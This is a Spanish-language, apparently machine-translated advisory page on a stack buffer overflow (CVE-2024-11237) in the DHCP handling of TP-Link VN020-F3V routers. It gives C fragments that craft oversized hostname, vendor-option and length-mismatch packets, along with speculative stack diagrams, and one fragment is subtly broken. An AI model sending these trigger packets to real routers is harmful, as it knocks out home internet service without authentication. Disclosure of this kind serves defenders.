Descargar TP Thumper - Descargar el código fuente TP Thumper

TP Thumper

Otro código fuente

Descargar

TP-Link VN020 Corrupción de memoria DHCP (CVE-2024-11237)

Vulnerabilidad crítica en el procesamiento de paquetes DHCP

Descripción general

Se ha descubierto una vulnerabilidad crítica en los enrutadores TP-Link VN020 F3V (T) que ejecutan la versión de firmware TT_V6.2.1021. La vulnerabilidad permite a los atacantes remotos desencadenar un desbordamiento de búfer a base de pila a través de paquetes de descubrimiento DHCP especialmente elaborados, lo que lleva a las condiciones de denegación de servicio (DOS).

Dispositivos afectados:

Modelo de enrutador: TP-Link VN020-F3V (T)
Versión de firmware: TT_V6.2.1021
Despliegue: Principalmente a través de Tunisie Telecom y TopNet ISPS
Variantes confirmadas: también afecta las versiones argelinas y marroquíes

Nota importante: Debido a la naturaleza patentada del firmware, se desconocen los detalles exactos de implementación interna. Este análisis se basa en el comportamiento observado y las pruebas de caja negra.

Detalles de vulnerabilidad

ID de CVE : CVE-2024-11237
Tipo : desbordamiento del búfer a base de pila (CWE-121)
Vector de ataque : remoto (paquete DHCP Discover)
Autenticación : no se requiere ninguna
Puerto : UDP/67 (servidor DHCP)
Impacto : DOS (confirmado) y RCE (posible)
Complejidad : baja

Análisis técnico

Estructura de paquetes DHCP

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

Vectores de explotación

Procesamiento del nombre de host DHCP

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

Opción específica del proveedor

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

Manipulación de campo de longitud

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Corrupción de memoria potencial

Si bien se desconoce la implementación interna exacta, el comportamiento observado sugiere posibles problemas de corrupción de la memoria:

Procesamiento normal del nombre de host DHCP

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

¿Qué podría estar sucediendo dentro del enrutador?

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Esto es teórico, y ciertos detalles pueden no ser completamente precisos, ya que TP-Link proporciona el firmware para este enrutador exclusivamente a los ISP.